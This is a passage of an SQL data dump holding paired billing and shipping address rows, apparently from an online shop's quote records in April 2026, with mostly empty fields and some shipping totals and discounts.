(1791, 1079, '2026-04-19 13:21:58', '2026-04-19 13:21:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1792, 1079, '2026-04-19 13:21:58', '2026-04-19 13:21:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1793, 1080, '2026-04-19 13:40:38', '2026-04-19 13:40:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1794, 1080, '2026-04-19 13:40:38', '2026-04-19 13:40:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1795, 1081, '2026-04-19 18:45:29', '2026-04-19 18:45:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1796, 1081, '2026-04-19 18:45:29', '2026-04-19 18:45:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1797, 1082, '2026-04-19 18:45:37', '2026-04-19 18:45:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1798, 1082, '2026-04-19 18:45:37', '2026-04-19 18:45:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1799, 1083, '2026-04-19 18:45:44', '2026-04-19 18:45:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1800, 1083, '2026-04-19 18:45:44', '2026-04-19 18:45:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1801, 1084, '2026-04-19 18:45:52', '2026-04-19 18:45:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1802, 1084, '2026-04-19 18:45:52', '2026-04-19 18:45:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1803, 1085, '2026-04-19 18:46:01', '2026-04-19 18:46:01', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1804, 1085, '2026-04-19 18:46:01', '2026-04-19 18:46:01', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1805, 1086, '2026-04-19 18:46:09', '2026-04-19 18:46:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1806, 1086, '2026-04-19 18:46:09', '2026-04-19 18:46:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1807, 1087, '2026-04-19 18:46:16', '2026-04-19 18:46:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1808, 1087, '2026-04-19 18:46:16', '2026-04-19 18:46:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1809, 1088, '2026-04-19 21:46:04', '2026-04-19 21:46:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1810, 1088, '2026-04-19 21:46:04', '2026-04-19 21:46:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1811, 1089, '2026-04-19 23:03:03', '2026-04-19 23:03:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1812, 1089, '2026-04-19 23:03:04', '2026-04-19 23:03:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1813, 1090, '2026-04-20 01:06:36', '2026-04-20 01:06:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1814, 1090, '2026-04-20 01:06:36', '2026-04-20 01:06:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1815, 1091, '2026-04-20 06:06:41', '2026-04-20 06:06:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1816, 1091, '2026-04-20 06:06:41', '2026-04-20 06:06:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1817, 1092, '2026-04-20 06:10:38', '2026-04-20 06:10:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1818, 1092, '2026-04-20 06:10:38', '2026-04-20 06:10:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1819, 1093, '2026-04-20 08:32:49', '2026-04-20 08:32:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1820, 1093, '2026-04-20 08:32:49', '2026-04-20 08:32:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1821, 1094, '2026-04-20 15:17:51', '2026-04-20 15:17:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1822, 1094, '2026-04-20 15:17:51', '2026-04-20 15:17:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1823, 1095, '2026-04-20 18:03:15', '2026-04-20 18:03:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1824, 1095, '2026-04-20 18:03:15', '2026-04-20 18:03:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1825, 1096, '2026-04-20 18:52:06', '2026-04-20 18:52:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1826, 1096, '2026-04-20 18:52:06', '2026-04-20 18:52:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1827, 1097, '2026-04-20 21:46:15', '2026-04-20 21:46:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1828, 1097, '2026-04-20 21:46:15', '2026-04-20 21:46:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1829, 1098, '2026-04-20 22:18:39', '2026-04-20 22:18:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1830, 1098, '2026-04-20 22:18:39', '2026-04-20 22:18:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1831, 1099, '2026-04-21 03:19:23', '2026-04-21 03:19:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1832, 1099, '2026-04-21 03:19:23', '2026-04-21 03:19:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1833, 1100, '2026-04-21 05:42:35', '2026-04-21 05:42:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1834, 1100, '2026-04-21 05:42:35', '2026-04-21 05:42:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1835, 1101, '2026-04-21 05:56:36', '2026-04-21 05:56:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1836, 1101, '2026-04-21 05:56:36', '2026-04-21 05:56:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
